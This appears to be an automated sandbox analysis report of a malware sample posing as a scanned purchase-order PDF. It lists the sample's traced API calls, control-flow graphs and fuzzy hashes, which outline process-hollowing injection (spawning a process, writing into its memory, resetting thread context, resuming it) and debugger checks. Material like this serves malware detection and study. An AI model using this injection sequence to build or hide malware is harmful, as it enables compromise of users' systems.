                                                                                  execution_graph 31493 3217f80 31494 3217fa7 31493->31494 31495 3218084 31494->31495 31497 3217a1c 31494->31497 31498 3219010 CreateActCtxA 31497->31498 31500 32190d3 31498->31500 31652 321e298 31653 321e2e0 GetModuleHandleW 31652->31653 31654 321e2da 31652->31654 31655 321e30d 31653->31655 31654->31653 31656 91aaba0 31657 91aabc6 31656->31657 31658 91aad2b 31656->31658 31657->31658 31660 91a5a14 31657->31660 31661 91aae20 PostMessageW 31660->31661 31662 91aae8c 31661->31662 31662->31657 31501 91a6eb1 31502 91a6e38 31501->31502 31503 91a6e48 31502->31503 31506 91a9878 31502->31506 31511 91a9868 31502->31511 31507 91a988d 31506->31507 31516 91a98a9 31507->31516 31530 91a9916 31507->31530 31508 91a989f 31508->31503 31512 91a988d 31511->31512 31514 91a98a9 12 API calls 31512->31514 31515 91a9916 12 API calls 31512->31515 31513 91a989f 31513->31503 31514->31513 31515->31513 31517 91a98d2 31516->31517 31520 91a98f6 31517->31520 31545 91a9d1f 31517->31545 31549 91a9edb 31517->31549 31553 91aa37a 31517->31553 31557 91a9e24 31517->31557 31562 91aa1e1 31517->31562 31567 91aa5ef 31517->31567 31571 91a9f0e 31517->31571 31575 91aa0f5 31517->31575 31581 91a9fb7 31517->31581 31585 91aa336 31517->31585 31589 91a9e5d 31517->31589 31520->31508 31531 91a98a4 31530->31531 31533 91a9919 31530->31533 31532 91a98f6 31531->31532 31534 91aa37a 2 API calls 31531->31534 31535 91a9edb 2 API calls 31531->31535 31536 91a9d1f 2 API calls 31531->31536 31537 91a9e5d 2 API calls 31531->31537 31538 91aa336 2 API calls 31531->31538 31539 91a9fb7 2 API calls 31531->31539 31540 91aa0f5 2 API calls 31531->31540 31541 91a9f0e 2 API calls 31531->31541 31542 91aa5ef 2 API calls 31531->31542 31543 91aa1e1 2 API calls 31531->31543 31544 91a9e24 2 API calls 31531->31544 31532->31508 31534->31532 31535->31532 31536->31532 31537->31532 31538->31532 31539->31532 31540->31532 31541->31532 31542->31532 31543->31532 31544->31532 31594 91a69d8 31545->31594 31598 91a69cd 31545->31598 31602 91a6690 31549->31602 31606 91a6689 31549->31606 31550 91a9ef9 31550->31520 31610 91aab10 31553->31610 31615 91aab20 31553->31615 31554 91aa392 31558 91a9e3e 31557->31558 31559 91a9fd0 31558->31559 31628 91a60c8 31558->31628 31632 91a60d0 31558->31632 31559->31520 31563 91aa1e7 31562->31563 31636 91a6749 31563->31636 31640 91a6750 31563->31640 31564 91aa219 31569 91a65b8 Wow64SetThreadContext 31567->31569 31570 91a65b0 Wow64SetThreadContext 31567->31570 31568 91aa2ef 31568->31567 31569->31568 31570->31568 31644 91a683c 31571->31644 31648 91a6840 31571->31648 31572 91a9f30 31572->31520 31577 91aa102 31575->31577 31576 91aa219 31578 91a9d7a 31577->31578 31579 91a6749 WriteProcessMemory 31577->31579 31580 91a6750 WriteProcessMemory 31577->31580 31579->31576 31580->31576 31583 91a60c8 ResumeThread 31581->31583 31584 91a60d0 ResumeThread 31581->31584 31582 91a9fd0 31582->31520 31583->31582 31584->31582 31587 91a6749 WriteProcessMemory 31585->31587 31588 91a6750 WriteProcessMemory 31585->31588 31586 91a9d7a 31586->31520 31587->31586 31588->31586 31590 91a9e80 31589->31590 31592 91a6749 WriteProcessMemory 31590->31592 31593 91a6750 WriteProcessMemory 31590->31593 31591 91aa454 31592->31591 31593->31591 31595 91a6a61 31594->31595 31595->31595 31596 91a6bc6 CreateProcessA 31595->31596 31597 91a6c23 31596->31597 31599 91a6a61 31598->31599 31599->31599 31600 91a6bc6 CreateProcessA 31599->31600 31601 91a6c23 31600->31601 31603 91a66d0 VirtualAllocEx 31602->31603 31605 91a670d 31603->31605 31605->31550 31607 91a66d0 VirtualAllocEx 31606->31607 31609 91a670d 31607->31609 31609->31550 31611 91aab35 31610->31611 31620 91a65b8 31611->31620 31624 91a65b0 31611->31624 31612 91aab4b 31612->31554 31616 91aab35 31615->31616 31618 91a65b8 Wow64SetThreadContext 31616->31618 31619 91a65b0 Wow64SetThreadContext 31616->31619 31617 91aab4b 31617->31554 31618->31617 31619->31617 31621 91a65fd Wow64SetThreadContext 31620->31621 31623 91a6645 31621->31623 31623->31612 31625 91a65fd Wow64SetThreadContext 31624->31625 31627 91a6645 31625->31627 31627->31612 31629 91a6110 ResumeThread 31628->31629 31631 91a6141 31629->31631 31631->31559 31633 91a6110 ResumeThread 31632->31633 31635 91a6141 31633->31635 31635->31559 31637 91a6798 WriteProcessMemory 31636->31637 31639 91a67ef 31637->31639 31639->31564 31641 91a6798 WriteProcessMemory 31640->31641 31643 91a67ef 31641->31643 31643->31564 31645 91a688b ReadProcessMemory 31644->31645 31647 91a68cf 31645->31647 31647->31572 31649 91a688b ReadProcessMemory 31648->31649 31651 91a68cf 31649->31651 31651->31572 31447 8cd6c00 31448 8cd6c0c 31447->31448 31451 8cd99bd 31448->31451 31449 8cd6c1d 31452 8cd99dc 31451->31452 31456 8cda8f8 31452->31456 31460 8cda8f4 31452->31460 31453 8cd9a86 31453->31449 31457 8cda90a 31456->31457 31464 8cda930 31457->31464 31461 8cda90a 31460->31461 31463 8cda930 NtQueryInformationProcess 31461->31463 31462 8cda91e 31462->31453 31463->31462 31465 8cda952 31464->31465 31469 8cdaa08 31465->31469 31473 8cdaa03 31465->31473 31466 8cda91e 31466->31453 31470 8cdaa2c 31469->31470 31477 8cd6b84 31470->31477 31474 8cdaa2c 31473->31474 31475 8cd6b84 NtQueryInformationProcess 31474->31475 31476 8cdaab3 31475->31476 31476->31466 31478 8cdab68 NtQueryInformationProcess 31477->31478 31480 8cdaab3 31478->31480 31480->31466 31481 8cdb8d0 31483 8cdb8f4 31481->31483 31485 8cdb264 31483->31485 31489 8cdb270 31483->31489 31486 8cdbf40 OutputDebugStringW 31485->31486 31488 8cdbfbf 31486->31488 31488->31483 31490 8cdbff0 CloseHandle 31489->31490 31492 8cdc05e 31490->31492 31492->31483

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 186 8cd6b84-8cdabf4 NtQueryInformationProcess 189 8cdabfd-8cdac11 186->189 190 8cdabf6-8cdabfc 186->190 190->189
                                                                                  APIs
                                                                                  • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 08CDABE7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID: InformationProcessQuery
                                                                                  • String ID:
                                                                                  • API String ID: 1778838933-0
                                                                                  • Opcode ID: 9dcdd2e9e00f15084015ce3ccf1f8b3beec49703f96e579371938ecacceacba2
                                                                                  • Instruction ID: dbe0947053e7c5bc44a730b5c37241c1f553b15b8ea60646a73a34262f89ba2b
                                                                                  • Opcode Fuzzy Hash: 9dcdd2e9e00f15084015ce3ccf1f8b3beec49703f96e579371938ecacceacba2
                                                                                  • Instruction Fuzzy Hash: FA21FEB5900359AFCB10DF9AD884ADEBBF5FB48310F10842AEA18A7210C374A944CFA0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 192 8cdab60-8cdabf4 NtQueryInformationProcess 194 8cdabfd-8cdac11 192->194 195 8cdabf6-8cdabfc 192->195 195->194
                                                                                  APIs
                                                                                  • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 08CDABE7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID: InformationProcessQuery
                                                                                  • String ID:
                                                                                  • API String ID: 1778838933-0
                                                                                  • Opcode ID: 292fb27bf326f072c922c0c22b38d08a4bdc59d59b29b22f3c8d1b52d1ed83f6
                                                                                  • Instruction ID: e0e09366d0da936a400b6b4bc1a99e0c1f7a6fa82c8da371ceb95c90fe07bc0d
                                                                                  • Opcode Fuzzy Hash: 292fb27bf326f072c922c0c22b38d08a4bdc59d59b29b22f3c8d1b52d1ed83f6
                                                                                  • Instruction Fuzzy Hash: EC21EFB6901359DFCB10DF9AD884ADEFBF5FB48320F10852AE918A7250C375A554CFA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 025ff92895fce97862fb7754936627702b00cfebec4b0d2244042f64c9042f55
                                                                                  • Instruction ID: 66b81fde737120b16fadbf51d5c3a3b44312e4b931cb9f9a7a36fcf324928a6a
                                                                                  • Opcode Fuzzy Hash: 025ff92895fce97862fb7754936627702b00cfebec4b0d2244042f64c9042f55
                                                                                  • Instruction Fuzzy Hash: 60429074E01218CFDB24DFA9C984B9DBBB2FF48311F1485A9E919AB355D730AA81CF50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 740e0f1dfb6d410d734e5d219b35d09b5b208a23d8631f367de43f73e34b3413
                                                                                  • Instruction ID: f3ba35118782c792e03de9454a81fb29215110e492970dc7b96e88825c8d35b1
                                                                                  • Opcode Fuzzy Hash: 740e0f1dfb6d410d734e5d219b35d09b5b208a23d8631f367de43f73e34b3413
                                                                                  • Instruction Fuzzy Hash: 7732A374D01219CFEB64DF69C684A8EFBB2FF58212F55C199D548AB211CB30D986CFA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b2b9d18041c98f509e14390fd057d8c1c0cc814128a817b8c4df09e7c10f7da2
                                                                                  • Instruction ID: 72db0e131764960a11fc45c97d71e3921ea18f4e3aacfbdbb9033442eb81d395
                                                                                  • Opcode Fuzzy Hash: b2b9d18041c98f509e14390fd057d8c1c0cc814128a817b8c4df09e7c10f7da2
                                                                                  • Instruction Fuzzy Hash: 69022B70A00219CFDB14EFA9D8547AEBBF6BF88701F248559E506AB351EF34D942CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e581df251800cd0eefd2696ca5858b259faca5029eab232beb82af751ad0f9a1
                                                                                  • Instruction ID: 48606a5b687c7b9e81259c453b191e5a3bb83d1e43d1f16949619f19a8293ada
                                                                                  • Opcode Fuzzy Hash: e581df251800cd0eefd2696ca5858b259faca5029eab232beb82af751ad0f9a1
                                                                                  • Instruction Fuzzy Hash: 08E1D879B053449BDB29EF79C450BAEB7FAAF89304F10842DE1469B294CB38ED41CB50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8241c801be3b6bdff3c82f10ca94a4256996d46c15a8c4997135dfe68a1f5901
                                                                                  • Instruction ID: 7d8153ba4bb4013f6b1c281001e228da69d6e0a1b976fff4a02f788e6318607c
                                                                                  • Opcode Fuzzy Hash: 8241c801be3b6bdff3c82f10ca94a4256996d46c15a8c4997135dfe68a1f5901
                                                                                  • Instruction Fuzzy Hash: 8DD13F70A00219DFCB15EFA9C984AADFBF2BF89341F19815AE505AB361D730ED42CB50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9ba821139fed63f1bee1f5f7e02a34b8a82e26c15963b445994d37d7b84a74bd
                                                                                  • Instruction ID: adf0514d917234b9bb108ece8a0556b808c16baacf17be24da0270e3fd5fa232
                                                                                  • Opcode Fuzzy Hash: 9ba821139fed63f1bee1f5f7e02a34b8a82e26c15963b445994d37d7b84a74bd
                                                                                  • Instruction Fuzzy Hash: 72517F75D006199FDB08DFEAD8446EEFBB2FF88311F14812AE919BB254DB345A46CB40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 39f047707e249743b85b293969e93a24540b5e0f26033542ccf680fd6b48fd3e
                                                                                  • Instruction ID: 5db33f195ef1eeef5e76738067ab25f5dda0277ec257345752d8fb0fdbebed40
                                                                                  • Opcode Fuzzy Hash: 39f047707e249743b85b293969e93a24540b5e0f26033542ccf680fd6b48fd3e
                                                                                  • Instruction Fuzzy Hash: 3B418271E006199BDB08DFEAD84469EFBF2AF88301F14C12AD519AB354EB345946CF40

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 91a69cd-91a6a6d 2 91a6a6f-91a6a79 0->2 3 91a6aa6-91a6ac6 0->3 2->3 4 91a6a7b-91a6a7d 2->4 8 91a6ac8-91a6ad2 3->8 9 91a6aff-91a6b2e 3->9 6 91a6a7f-91a6a89 4->6 7 91a6aa0-91a6aa3 4->7 10 91a6a8b 6->10 11 91a6a8d-91a6a9c 6->11 7->3 8->9 12 91a6ad4-91a6ad6 8->12 19 91a6b30-91a6b3a 9->19 20 91a6b67-91a6c21 CreateProcessA 9->20 10->11 11->11 13 91a6a9e 11->13 14 91a6ad8-91a6ae2 12->14 15 91a6af9-91a6afc 12->15 13->7 17 91a6ae6-91a6af5 14->17 18 91a6ae4 14->18 15->9 17->17 21 91a6af7 17->21 18->17 19->20 22 91a6b3c-91a6b3e 19->22 31 91a6c2a-91a6cb0 20->31 32 91a6c23-91a6c29 20->32 21->15 24 91a6b40-91a6b4a 22->24 25 91a6b61-91a6b64 22->25 26 91a6b4e-91a6b5d 24->26 27 91a6b4c 24->27 25->20 26->26 28 91a6b5f 26->28 27->26 28->25 42 91a6cb2-91a6cb6 31->42 43 91a6cc0-91a6cc4 31->43 32->31 42->43 46 91a6cb8 42->46 44 91a6cc6-91a6cca 43->44 45 91a6cd4-91a6cd8 43->45 44->45 47 91a6ccc 44->47 48 91a6cda-91a6cde 45->48 49 91a6ce8-91a6cec 45->49 46->43 47->45 48->49 50 91a6ce0 48->50 51 91a6cfe-91a6d05 49->51 52 91a6cee-91a6cf4 49->52 50->49 53 91a6d1c 51->53 54 91a6d07-91a6d16 51->54 52->51 55 91a6d1d 53->55 54->53 55->55
                                                                                  APIs
                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 091A6C0E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateProcess
                                                                                  • String ID:
                                                                                  • API String ID: 963392458-0
                                                                                  • Opcode ID: d6d4be3fe88203fc25d4b32f273b699c082002dc40bee1e84b48715a13c9a695
                                                                                  • Instruction ID: 6e4ffa2c0a6c230fd9a70d8d21f91cd829a5a46bbcce651575f9c39ac499d3b0
                                                                                  • Opcode Fuzzy Hash: d6d4be3fe88203fc25d4b32f273b699c082002dc40bee1e84b48715a13c9a695
                                                                                  • Instruction Fuzzy Hash: 55A15975E00719CFDB20DF68C841BAEBBB2FF48314F188569E819A7280DB759985CF91

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 57 91a69d8-91a6a6d 59 91a6a6f-91a6a79 57->59 60 91a6aa6-91a6ac6 57->60 59->60 61 91a6a7b-91a6a7d 59->61 65 91a6ac8-91a6ad2 60->65 66 91a6aff-91a6b2e 60->66 63 91a6a7f-91a6a89 61->63 64 91a6aa0-91a6aa3 61->64 67 91a6a8b 63->67 68 91a6a8d-91a6a9c 63->68 64->60 65->66 69 91a6ad4-91a6ad6 65->69 76 91a6b30-91a6b3a 66->76 77 91a6b67-91a6c21 CreateProcessA 66->77 67->68 68->68 70 91a6a9e 68->70 71 91a6ad8-91a6ae2 69->71 72 91a6af9-91a6afc 69->72 70->64 74 91a6ae6-91a6af5 71->74 75 91a6ae4 71->75 72->66 74->74 78 91a6af7 74->78 75->74 76->77 79 91a6b3c-91a6b3e 76->79 88 91a6c2a-91a6cb0 77->88 89 91a6c23-91a6c29 77->89 78->72 81 91a6b40-91a6b4a 79->81 82 91a6b61-91a6b64 79->82 83 91a6b4e-91a6b5d 81->83 84 91a6b4c 81->84 82->77 83->83 85 91a6b5f 83->85 84->83 85->82 99 91a6cb2-91a6cb6 88->99 100 91a6cc0-91a6cc4 88->100 89->88 99->100 103 91a6cb8 99->103 101 91a6cc6-91a6cca 100->101 102 91a6cd4-91a6cd8 100->102 101->102 104 91a6ccc 101->104 105 91a6cda-91a6cde 102->105 106 91a6ce8-91a6cec 102->106 103->100 104->102 105->106 107 91a6ce0 105->107 108 91a6cfe-91a6d05 106->108 109 91a6cee-91a6cf4 106->109 107->106 110 91a6d1c 108->110 111 91a6d07-91a6d16 108->111 109->108 112 91a6d1d 110->112 111->110 112->112
                                                                                  APIs
                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 091A6C0E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateProcess
                                                                                  • String ID:
                                                                                  • API String ID: 963392458-0
                                                                                  • Opcode ID: 5a24100017de040be5b633ab4d7dd0b622194f8f439b414084e9a166ed095c2c
                                                                                  • Instruction ID: 55c54fbd23c6c2f5f53b3e29d74e5c2c23c64b813ac6ae25aa17e1ad036b877d
                                                                                  • Opcode Fuzzy Hash: 5a24100017de040be5b633ab4d7dd0b622194f8f439b414084e9a166ed095c2c
                                                                                  • Instruction Fuzzy Hash: 9A915B75E00719CFDB20DF68C841B9EBBB2FF48714F188569E818A7280DB759985CF91

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 114 3217a1c-32190d1 CreateActCtxA 117 32190d3-32190d9 114->117 118 32190da-3219134 114->118 117->118 125 3219143-3219147 118->125 126 3219136-3219139 118->126 127 3219149-3219155 125->127 128 3219158 125->128 126->125 127->128
                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 032190C1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1460113401.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_3210000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: 403bb42a911d0fd5918e43d9a550e0a2a8519ba5550f703393e7b739b099bee3
                                                                                  • Instruction ID: 21420f247f853aa63d19c10785192fbebec6181a271e0ab74c303adeb61f9edf
                                                                                  • Opcode Fuzzy Hash: 403bb42a911d0fd5918e43d9a550e0a2a8519ba5550f703393e7b739b099bee3
                                                                                  • Instruction Fuzzy Hash: 3D41E1B0D10719CFDB24DFA9C944B8EBBF1BF89704F20806AD508AB251DB756985CF90

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 130 91a6749-91a679e 132 91a67ae-91a67ed WriteProcessMemory 130->132 133 91a67a0-91a67ac 130->133 135 91a67ef-91a67f5 132->135 136 91a67f6-91a6826 132->136 133->132 135->136
                                                                                  APIs
                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 091A67E0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryProcessWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3559483778-0
                                                                                  • Opcode ID: 940255956f35430e56f93f76ef19efb29f7e50e0513123648eb6d3a8a4117316
                                                                                  • Instruction ID: c59fb18d38aca3798a441bcb9c4aa80e0a59bea9027aaad16fa3ce346871d682
                                                                                  • Opcode Fuzzy Hash: 940255956f35430e56f93f76ef19efb29f7e50e0513123648eb6d3a8a4117316
                                                                                  • Instruction Fuzzy Hash: 6E2148759103499FDB10DFA9C880BEEBBF1FF88310F14842EE959A7240C7789954DB60

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 140 91a6750-91a679e 142 91a67ae-91a67ed WriteProcessMemory 140->142 143 91a67a0-91a67ac 140->143 145 91a67ef-91a67f5 142->145 146 91a67f6-91a6826 142->146 143->142 145->146
                                                                                  APIs
                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 091A67E0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryProcessWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3559483778-0
                                                                                  • Opcode ID: dbaf8b37a5f4cefc7602da2440c2ad3fa11667ecfa42883cb4e42ff2704e7c58
                                                                                  • Instruction ID: 4a37c19a3e0a45199a0ee04be82cbd730548cd635797089b36fef8f7efe3a4cb
                                                                                  • Opcode Fuzzy Hash: dbaf8b37a5f4cefc7602da2440c2ad3fa11667ecfa42883cb4e42ff2704e7c58
                                                                                  • Instruction Fuzzy Hash: 982125759103099FDF10DFAAC881BDEBBF5FF88310F14842AE958A7240C7789954DBA0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 150 91a65b0-91a6603 152 91a6613-91a6643 Wow64SetThreadContext 150->152 153 91a6605-91a6611 150->153 155 91a664c-91a667c 152->155 156 91a6645-91a664b 152->156 153->152 156->155
                                                                                  APIs
                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 091A6636
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID: ContextThreadWow64
                                                                                  • String ID:
                                                                                  • API String ID: 983334009-0
                                                                                  • Opcode ID: 19fbfe6efecea9be56e3697ce890b49daf2ac035e9ce2142ca81cc1601ddc1e1
                                                                                  • Instruction ID: c7022d27d68cbbb63dd760bedb4bf1b0c404c38d3482c0631f2657b261718a07
                                                                                  • Opcode Fuzzy Hash: 19fbfe6efecea9be56e3697ce890b49daf2ac035e9ce2142ca81cc1601ddc1e1
                                                                                  • Instruction Fuzzy Hash: CC216875D003098FDB14DFAAC4857EEBBF4AF88324F54842DD559A7241CB789945CFA0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 160 91a683c-91a68cd ReadProcessMemory 163 91a68cf-91a68d5 160->163 164 91a68d6-91a6906 160->164 163->164
                                                                                  APIs
                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 091A68C0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryProcessRead
                                                                                  • String ID:
                                                                                  • API String ID: 1726664587-0
                                                                                  • Opcode ID: 2347086d5684c67222abb1b680f29ff3ed9bc79dcbbfe036f88d85e50ec1f6fc
                                                                                  • Instruction ID: 7d746e02ae23a0b745e1ec6fca943d34747839dd5330664eb78564575bd6e52f
                                                                                  • Opcode Fuzzy Hash: 2347086d5684c67222abb1b680f29ff3ed9bc79dcbbfe036f88d85e50ec1f6fc
                                                                                  • Instruction Fuzzy Hash: 0B212271D003499FDB10DFAAC881BEEBBF5BF88320F14882EE559A7240C7789944DB60

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 178 91a6840-91a68cd ReadProcessMemory 181 91a68cf-91a68d5 178->181 182 91a68d6-91a6906 178->182 181->182
                                                                                  APIs
                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 091A68C0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryProcessRead
                                                                                  • String ID:
                                                                                  • API String ID: 1726664587-0
                                                                                  • Opcode ID: d8d4766d77e722e4eadff9d6ec4a7dc637cd24f6844629e1bd66b0becf7e9024
                                                                                  • Instruction ID: 6fe546aa5f103f62883200354fc5cea2259c1c733df9e437708066002fd91ee6
                                                                                  • Opcode Fuzzy Hash: d8d4766d77e722e4eadff9d6ec4a7dc637cd24f6844629e1bd66b0becf7e9024
                                                                                  • Instruction Fuzzy Hash: B9212871D003499FDB10DFAAC880BEEBBF5FF48320F148429E558A7240C7799944DBA0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 168 91a65b8-91a6603 170 91a6613-91a6643 Wow64SetThreadContext 168->170 171 91a6605-91a6611 168->171 173 91a664c-91a667c 170->173 174 91a6645-91a664b 170->174 171->170 174->173
                                                                                  APIs
                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 091A6636
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID: ContextThreadWow64
                                                                                  • String ID:
                                                                                  • API String ID: 983334009-0
